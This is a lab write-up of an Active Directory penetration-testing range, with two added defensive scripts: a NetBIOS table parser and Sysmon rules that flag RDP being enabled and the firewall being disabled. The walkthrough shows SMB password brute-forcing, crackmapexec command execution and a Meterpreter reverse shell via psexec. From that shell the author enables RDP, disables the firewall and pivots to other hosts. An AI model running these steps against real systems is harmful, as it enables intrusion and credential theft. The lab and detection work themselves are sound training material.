Advanced Penetration Testing Techniques - AD Range (2)


Posted by nathan2009729 on 2023-04-25

AD range (2)


Next target: 172.25.170.90. The related challenge is as follows:

10 (Challenge 9) What is the NetBIOS name of the machine located at 172.25.170.90?

┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# nmap -p- 172.16.170.90
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 23:45 EDT
Stats: 0:00:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.98% done; ETC: 23:47 (0:01:21 remaining)
Nmap scan report for 172.16.170.90
Host is up (0.023s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49674/tcp open  unknown
49721/tcp open  unknown
49755/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 105.69 seconds

┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666-49674,49721,49755 172.16.170.90 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 23:49 EDT
Nmap scan report for 172.16.170.90
Host is up (0.048s latency).

PORT      STATE    SERVICE      VERSION
53/tcp    open     domain       Simple DNS Plus
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 03:49:13Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: CPENT.LOCALNET, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: LA)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: CPENT.LOCALNET, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf       .NET Message Framing
49666/tcp open     msrpc        Microsoft Windows RPC
49667/tcp open     msrpc        Microsoft Windows RPC
49668/tcp filtered unknown
49669/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open     msrpc        Microsoft Windows RPC
49671/tcp filtered unknown
49672/tcp filtered unknown
49673/tcp filtered unknown
49674/tcp open     msrpc        Microsoft Windows RPC
49721/tcp open     msrpc        Microsoft Windows RPC
49755/tcp open     msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2016 (89%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FORESTB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
|   Computer name: ForestB
|   NetBIOS computer name: FORESTB\x00
|   Domain name: LA.CPENT.LOCALNET
|   Forest name: CPENT.LOCALNET
|   FQDN: ForestB.LA.CPENT.LOCALNET
|_  System time: 2023-04-01T20:50:08-07:00
| smb2-time:
|   date: 2023-04-02T03:50:09
|_  start_date: 2023-03-26T12:59:28
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h20m00s, deviation: 4h02m30s, median: 0s

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   63.01 ms 192.168.200.1
2   63.03 ms 172.16.170.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.63 seconds

Challenge 9:

What is the NetBIOS name of the machine located at 172.25.170.90?

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
|   Computer name: ForestB
|   NetBIOS computer name: FORESTB\x00
|   Domain name: LA.CPENT.LOCALNET
|   Forest name: CPENT.LOCALNET
|   FQDN: ForestB.LA.CPENT.LOCALNET

The top level is the forest, then the domain, and finally the computer, so a machine's full name (FQDN) is (computer name).(domain name). The NetBIOS name should therefore be the domain name: LA

But that reasoning is not reliable. A better approach is to guess the SMB password first and then use crackmapexec to get the answer. Guessing the SMB password of .90:

┌──(root㉿kali)-[~]
└─# hydra -L /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt smb://172.16.170.90
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-23 01:17:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1820 login tries (l:35/p:52), ~1820 tries per task
[DATA] attacking smb://172.16.170.90:445/
[STATUS] 1.00 tries/min, 1 tries in 00:01h, 1819 to do in 30:20h, 1 active
[STATUS] 193.33 tries/min, 580 tries in 00:03h, 1240 to do in 00:07h, 1 active
[445][smb] host: 172.16.170.90   login: aspen   password: cpent@123
[STATUS] 200.71 tries/min, 1405 tries in 00:07h, 415 to do in 00:03h, 1 active
[STATUS] 184.62 tries/min, 1477 tries in 00:08h, 343 to do in 00:02h, 1 active

You can also try medusa to brute-force the SMB password:

┌──(root㉿kali)-[~]
└─# medusa -h 172.16.170.90 -U /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: password (2 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 12345678 (3 of 51 complete)
...
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: aspen (27 of 34, 26 complete) Password: cpent123 (40 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: aspen (27 of 34, 26 complete) Password: cpent@123 (41 of 51 complete)
ACCOUNT FOUND: [smbnt] Host: 172.16.170.90 User: aspen Password: cpent@123 [SUCCESS (ADMIN$ - Access Allowed)]
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: cpent (28 of 34, 27 complete) Password: 123456 (1 of 51 complete)
...

If you don't want to watch the whole brute-force run, pipe it through grep to filter:

┌──(root㉿kali)-[~]
└─# medusa -h 172.16.170.90 -U /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt -M smbnt | grep FOUND
ACCOUNT FOUND: [smbnt] Host: 172.16.170.90 User: aspen Password: cpent@123 [SUCCESS (ADMIN$ - Access Allowed)]

Note: run this from the VM, not through Moba.

Once the password is cracked, use crackmapexec to find the answer:

┌──(root㉿kali)-[~]
└─# crackmapexec smb -d . -u aspen -p 'cpent@123' -x "cmd.exe /c nbtstat -n" 172.16.170.90
SMB         172.16.170.90   445    FORESTB          [*] Windows Server 2016 Datacenter 14393 x64 (name:FORESTB) (domain:.) (signing:True) (SMBv1:True)
SMB         172.16.170.90   445    FORESTB          [+] .\aspen:cpent@123 (Pwn3d!)
SMB         172.16.170.90   445    FORESTB          [+] Executed command
SMB         172.16.170.90   445    FORESTB          Ethernet:
SMB         172.16.170.90   445    FORESTB          Node IpAddress: [172.16.170.90] Scope Id: []
SMB         172.16.170.90   445    FORESTB
SMB         172.16.170.90   445    FORESTB          NetBIOS Local Name Table
SMB         172.16.170.90   445    FORESTB
SMB         172.16.170.90   445    FORESTB          Name               Type         Status
SMB         172.16.170.90   445    FORESTB          ---------------------------------------------
SMB         172.16.170.90   445    FORESTB          FORESTB        <00>  UNIQUE      Registered
SMB         172.16.170.90   445    FORESTB          LA             <00>  GROUP       Registered
SMB         172.16.170.90   445    FORESTB          LA             <1C>  GROUP       Registered
SMB         172.16.170.90   445    FORESTB          FORESTB        <20>  UNIQUE      Registered
SMB         172.16.170.90   445    FORESTB          LA             <1B>  UNIQUE      Registered

The answer is LA.
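The nbtstat table above is what decides the answer: each row is a NetBIOS name plus a one-byte suffix and a UNIQUE/GROUP flag, and the (suffix, type) pair says what the name is registered for. The script below is an added example (not from the original post): it parses the nbtstat -n output exactly as crackmapexec prints it (with the "SMB ip port host" prefix still attached), strips that prefix, and decodes the suffixes using Microsoft's documented NetBIOS suffix list. The sample text is the page's own output copied into the script, and the function names are mine.

```python
"""Decode a NetBIOS local name table (nbtstat -n) as relayed by crackmapexec.
Added example; not part of the original post."""
import re

# Constructed sample: the nbtstat -n rows from the page, still carrying the
# crackmapexec "SMB <ip> <port> <host>" prefix on every line.
SAMPLE = """\
SMB         172.16.170.90   445    FORESTB          NetBIOS Local Name Table
SMB         172.16.170.90   445    FORESTB
SMB         172.16.170.90   445    FORESTB          Name               Type         Status
SMB         172.16.170.90   445    FORESTB          ---------------------------------------------
SMB         172.16.170.90   445    FORESTB          FORESTB        <00>  UNIQUE      Registered
SMB         172.16.170.90   445    FORESTB          LA             <00>  GROUP       Registered
SMB         172.16.170.90   445    FORESTB          LA             <1C>  GROUP       Registered
SMB         172.16.170.90   445    FORESTB          FORESTB        <20>  UNIQUE      Registered
SMB         172.16.170.90   445    FORESTB          LA             <1B>  UNIQUE      Registered
"""

# Meaning of (suffix, type) pairs, per Microsoft's NetBIOS suffix list.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"):  "Domain / workgroup name",
    ("03", "UNIQUE"): "Messenger service",
    ("1B", "UNIQUE"): "Domain master browser (PDC emulator)",
    ("1C", "GROUP"):  "Domain controllers",
    ("1D", "UNIQUE"): "Master browser",
    ("1E", "GROUP"):  "Browser service elections",
    ("20", "UNIQUE"): "File server service",
}

# One table row: NAME <SUFFIX> UNIQUE|GROUP STATUS
ROW = re.compile(r"^(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)$")
CME_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s*")


def parse_nbt_table(text):
    """Return [(name, suffix, type, status), ...] from nbtstat -n output.
    A leading crackmapexec prefix is removed; non-row lines are skipped."""
    rows = []
    for line in text.splitlines():
        line = CME_PREFIX.sub("", line).strip()
        m = ROW.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            rows.append((name, suffix.upper(), ntype, status))
    return rows


def describe(rows):
    """Human-readable line per row, with the decoded suffix meaning."""
    return [f"{n:<15} <{s}> {t:<6} {SUFFIXES.get((s, t), 'unknown')}"
            for n, s, t, _ in rows]


def computer_name(rows):
    """The <00> UNIQUE entry is the host's own NetBIOS computer name."""
    return next((n for n, s, t, _ in rows if (s, t) == ("00", "UNIQUE")), None)


def domain_name(rows):
    """The <00> GROUP entry is the NetBIOS domain (or workgroup) name."""
    return next((n for n, s, t, _ in rows if (s, t) == ("00", "GROUP")), None)


def is_domain_controller(rows):
    """A host that registers <1C> GROUP for its domain is a domain controller."""
    return any((s, t) == ("1C", "GROUP") for _, s, t, _ in rows)


if __name__ == "__main__":
    rows = parse_nbt_table(SAMPLE)
    print("\n".join(describe(rows)))
    print("computer:", computer_name(rows), " domain:", domain_name(rows),
          " domain controller:", is_domain_controller(rows))
```

Run against the page's table this reports FORESTB as the computer name (<00> UNIQUE), LA as the NetBIOS domain name (<00> GROUP), and flags the host as a domain controller because it registers LA<1C>; the <1B> entry additionally marks it as the domain master browser, which is consistent with the nmap output identifying it as a DC for LA.CPENT.LOCALNET.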

Below is another, more cumbersome approach, which also failed. First, use the smb/psexec module in msf to establish a session:

┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# msfconsole

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search /smb/psexec

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/psexec_loggedin_users                   normal  No     Microsoft Windows Authenticated Logged In Users Enumeration
   1  exploit/windows/smb/psexec                   1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution
   2  auxiliary/admin/smb/psexec_ntdsgrab                           normal  No     PsExec NTDS.dit And SYSTEM Hive Download Utility


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/smb/psexec_ntdsgrab

msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.18.193   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set rhosts 172.16.170.90
rhosts => 172.16.170.90
msf6 exploit(windows/smb/psexec) > set lhost 192.168.200.7
lhost => 192.168.200.7
msf6 exploit(windows/smb/psexec) > set smbuser aspen
smbuser => aspen
msf6 exploit(windows/smb/psexec) > set smbpass cpent@123
smbpass => cpent@123
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.200.7:4444
[*] 172.16.170.90:445 - Connecting to the server...
[*] 172.16.170.90:445 - Authenticating to 172.16.170.90:445 as user 'aspen'...
[*] 172.16.170.90:445 - Selecting PowerShell target
[*] 172.16.170.90:445 - Executing the payload...
[+] 172.16.170.90:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.90
[*] Meterpreter session 1 opened (192.168.200.7:4444 -> 172.16.170.90:58279) at 2023-04-02 00:19:42 -0400

meterpreter >

Using the shell on the target machine, but the nbtstat command is not found?

meterpreter > shell
Process 3088 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>nbtstat -n
nbtstat -n
'nbtstat' is not recognized as an internal or external command,
operable program or batch file.

So I tried to enable the 3389 service from this shell, hoping to control the machine over Remote Desktop, but in the end NLA was enabled so it didn't work.

Activate remote desktop from command line - RDR-IT

That page has the following command; paste it directly:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Run the command:

meterpreter > shell
Process 3088 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.

Google how to turn off the firewall:

The command is as follows:

Netsh Advfirewall set allprofiles state off

Run the command:

C:\Windows\system32>Netsh Advfirewall set allprofiles state off
Netsh Advfirewall set allprofiles state off
Ok.

Next, google how to turn off NLA, but to no avail:

NLA is hard to turn off. Tried xfreerdp on Linux to get around it; in short, remote desktop failed.
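The two host changes made from the shell above (setting fDenyTSConnections to 0 to enable RDP, and turning all Windows Firewall profiles off with netsh) are exactly the kind of post-compromise activity a defender wants to alert on. The script below is an added example, not from the original post: it runs three simple rules over Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The events are constructed to mirror the commands shown on the page, the Sysmon field names (Image, CommandLine, TargetObject, Details) are the real ones, and the rule names and the event list are my own.

```python
"""Flag RDP being enabled via the registry and the Windows Firewall being
disabled, from Sysmon-style events. Added example; not from the original post."""
import re

# Constructed Sysmon events, reduced to the fields the rules need.
# EventID 1 = process creation, EventID 13 = registry value set.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "Netsh Advfirewall set allprofiles state off"},
    # Benign: only displays the profiles, must not fire.
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "netsh advfirewall show allprofiles"},
    # Benign: RDP being disabled again (value 1), must not fire.
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000001)"},
]

# (rule name, required EventID, {field: pattern}); every pattern must match.
RULES = [
    ("rdp_enabled_registry", 13, {
        "TargetObject": re.compile(r"\\Control\\Terminal Server\\fDenyTSConnections$", re.I),
        "Details": re.compile(r"DWORD \(0x0+\)$")}),
    ("rdp_enabled_cmdline", 1, {
        "CommandLine": re.compile(r"fDenyTSConnections.*\s/d\s+0\b", re.I)}),
    ("firewall_disabled", 1, {
        "Image": re.compile(r"\\netsh\.exe$", re.I),
        "CommandLine": re.compile(r"advfirewall\s+set\s+\S+\s+state\s+off", re.I)}),
]


def match_rules(events):
    """Return the names of the rules that fire, in event order."""
    hits = []
    for ev in events:
        for name, eid, conds in RULES:
            if ev.get("EventID") != eid:
                continue
            if all(p.search(ev.get(field, "")) for field, p in conds.items()):
                hits.append(name)
    return hits


if __name__ == "__main__":
    for hit in match_rules(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

The registry rule is the more robust of the two RDP rules: it fires on the resulting value regardless of whether reg.exe, PowerShell or a GUI made the change, while the command-line rule catches the attempt even when registry auditing is not in place. Matching on the value 0 (and not on 1) keeps the rule quiet when RDP is turned back off.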

Next, use .90 as a pivot to scan .20 and .70. The related challenges are as follows:

11 (Challenge 10) What is the last four hex numbers for the hash of adminflag.txt file on machine 172.25.170.20? (Hint: SHA256 Hash)

12 (Challenge 11) What is the contents of the adminflagBRAVO.txt at machine 172.25.170.70?

After exiting the shell on .90, use route add so that the attacking machine can scan .20 and .70:

C:\Windows\system32>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > route add 172.16.170.20/32 1
[*] Route added
msf6 exploit(windows/smb/psexec) > route add 172.16.170.70/32 1
[*] Route added
msf6 exploit(windows/smb/psexec) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.16.170.20      255.255.255.255    Session 1
   172.16.170.70      255.255.255.255    Session 1

[*] There are currently no IPv6 routes defined.

Find the TCP port scan module in msf:

msf6 exploit(windows/smb/psexec) > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf6 exploit(windows/smb/psexec) > use 5
msf6 auxiliary(scanner/portscan/tcp) > set ports 135,139,445,3389
ports => 135,139,445,3389
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 172.16.170.20
rhosts => 172.16.170.20
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 172.16.170.20:        - 172.16.170.20:3389 - TCP OPEN
[+] 172.16.170.20:        - 172.16.170.20:445 - TCP OPEN
[+] 172.16.170.20:        - 172.16.170.20:139 - TCP OPEN
[+] 172.16.170.20:        - 172.16.170.20:135 - TCP OPEN
[*] 172.16.170.20:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 172.16.170.90
rhosts => 172.16.170.90
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 172.16.170.90:        - 172.16.170.90:3389 - TCP OPEN
[+] 172.16.170.90:        - 172.16.170.90:445 - TCP OPEN
[+] 172.16.170.90:        - 172.16.170.90:139 - TCP OPEN
[+] 172.16.170.90:        - 172.16.170.90:135 - TCP OPEN
[*] 172.16.170.90:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After scanning .20 and .90, both indeed have 135, 139, 445 and 3389 open. 445 is SMB, so use msf's SMB credential-guessing module, smb_login:

msf6 auxiliary(scanner/portscan/tcp) > search smb login

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/windows/smb/ms04_007_killbill          2004-02-10       low        No     MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
   1  exploit/windows/smb/smb_relay                  2001-03-31       excellent  No     MS08-068 Microsoft Windows SMB Relay Code Execution
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average    Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/smb_shadow                 2021-02-16       manual     No     Microsoft Windows SMB Direct Session Takeover
   4  auxiliary/scanner/smb/smb_login                                 normal     No     SMB Login Check Scanner
   5  auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                   normal     No     SMB NTLMv1 Login Request Corruption


Interact with a module by name or index. For example info 5, use 5 or use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt

msf6 auxiliary(scanner/portscan/tcp) > use 4
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set rhosts 172.16.170.20
rhosts => 172.16.170.20
msf6 auxiliary(scanner/smb/smb_login) > set user_file /home/kali/LPT_day3/Usernames-CPENT.txt
user_file => /home/kali/LPT_day3/Usernames-CPENT.txt
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /home/kali/LPT_day3/Passwords-CPENT.txt
pass_file => /home/kali/LPT_day3/Passwords-CPENT.txt
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 172.16.170.20:445     - 172.16.170.20:445 - Starting SMB login bruteforce
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:123456',
[!] 172.16.170.20:445     - No active DB -- Credential data will not be saved!
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:password',
...
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:test123456',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:victor',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:puppettwo',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:studentpw',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:cpent123',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:cpent@123',
